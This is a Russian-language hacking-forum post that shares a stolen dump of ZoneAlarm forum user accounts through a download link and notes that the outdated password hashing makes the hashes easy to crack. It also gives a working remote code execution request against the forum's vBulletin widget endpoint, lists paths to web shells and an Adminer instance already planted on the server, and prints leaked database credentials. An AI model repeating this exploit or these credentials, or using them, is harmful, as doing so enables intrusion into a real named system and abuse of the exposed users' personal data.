• XSS.stack #1 – первый литературный журнал от юзеров форума

Форум ZoneAlarm (5k users)

Поп-Хлоп

(L3) cache
Пользователь
Регистрация
23.08.2019
Сообщения
213
Реакции
332
Вдогонку к утечке пользователей форума Comodo, небольшой leak от меня.
Свежий дамп пользователей форума ZoneAlarm. Хеширование паролей, как принято у "безопасников" - старое. Особых проблем с дешифровкой не возникнет. :)
[CLIKE]https://www.sendspace.com/file/tf1gya[/CLIKE]


У вас должно быть более 10 сообщений для просмотра скрытого контента.
Кстати, дырка у них на месте:
Код:
https://forums.zonealarm.com/ajax/render/widget_php
POST:
widgetConfig[code]=phpinfo();
На сервере так-же болтается уютный бложек.
 
ShooterScreenshot-4-08-11-19.png


там помойму только ленивый не побывал:

___forums_zonealarm_com/core/store_sitemap/adminer-4.2.0.php
___forums_zonealarm_com/core/store_sitemap/web.php
$config['MasterServer']['servername'] = 'zablog-db';
$config['MasterServer']['username'] = 'cpbloguser';
$config['MasterServer']['password'] = 'T3mp!12345';
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх